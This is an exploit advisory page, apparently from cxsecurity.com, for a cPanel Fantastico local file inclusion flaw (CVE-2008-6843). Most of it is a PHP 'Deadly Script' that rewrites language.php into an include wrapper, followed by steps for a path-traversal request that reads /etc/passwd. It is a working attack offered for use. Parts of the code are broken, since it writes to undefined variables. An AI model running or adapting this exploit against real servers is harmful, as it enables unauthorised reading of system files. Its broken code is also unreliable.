Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

2009-07-03 / 2009-07-04
Credit: Super-Crystal
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-6843
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Script : Cpanel 11.x bug : language.php [edite file] exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass" safemode off , mod_security off Disable functions : All NONE ,access root folder <?php /* ######################################## # Deadly Script by Super-Crystal # bypass Cpanel fantastico # www.arab4services.net # ##e-mail : l1un (at) hotmail (dot) com [email concealed] , i-1 (at) hotmail (dot) com [email concealed]## ####################################### */ set_time_limit(0); if(isset($_POST['sup3r'])) { if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) { $phpwrapper = '<?php include_once("./language/".$_GET[sup3r].".php"); ?> '; fwrite($h,$prctl); fclose($h); $handle = fopen($_POST['php'], "w"); fwrite($handle, $phpwrapper); fclose($handle); echo "Building exploit...<br />"; echo "coding by Super-Crystal <br />"; echo "Cleaning up<br />"; echo "Done!<br /> </pre>"; } else { echo "error : ".php_uname(); } } else { ?> <div align="center"> <h3>Deadly Script</h3> <font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br /> <pre><div align="center"> </pre></div><br /> <table border="0" cellspacing="0"> <tr> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <table border="0" cellspacing="0"> <tr> <td><div align="right">Exploit:</div></td> <td> <select name="exploit"> <option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option> </select> </td> </tr> <tr> <td><div align="right">change</div></td> <td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td> </tr> <tr> </table> </div> <input type="hidden" name="sup3r" value="doit" /> <input name="submit" type="submit" value="Submit" /><br /> 1- change /home/[user]/.fantasticodata/language.php <br /> 2- click on the submit <br /> 3- now put it like this (e.g) : http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../.. /../../../etc/passwd%00 . <br /> <font color=red>Written: 10.10.2008</font><br /> <font color=blue>Public: 26.11.2008</font><br /> <div align="center"> <font color=red>Author : Super-Crystal</font><br /> <a href="http://www.arab4services.net">Arab4services.net </a></center> </div> </form> <?php } ?> arab4services.net

References:

http://xforce.iss.net/xforce/xfdb/46991
http://www.securityfocus.com/bid/32578
http://www.securityfocus.com/archive/1/archive/1/498814/100/0/threaded


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top